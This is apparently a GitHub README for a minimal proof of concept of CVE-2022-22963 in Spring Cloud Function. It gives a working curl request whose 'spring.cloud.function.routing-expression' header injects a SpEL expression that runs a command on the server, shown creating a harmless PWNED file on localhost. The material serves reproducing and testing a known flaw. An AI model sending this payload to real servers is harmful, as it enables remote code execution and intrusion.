Skip to content

Latest commit

 

History

History
26 lines (16 loc) · 741 Bytes

README.md

File metadata and controls

26 lines (16 loc) · 741 Bytes

CVE-2022-22963 RCE PoC

Minimal example to reproduce CVE-2022-22963 remote code execution in org.springframework.cloud:spring-cloud-function-core.

Exploit

Run the server

mvn spring-boot:run

Make a request

curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter

As a result of the exploit file PWNED will be crated nearby pom.xml.

Additional info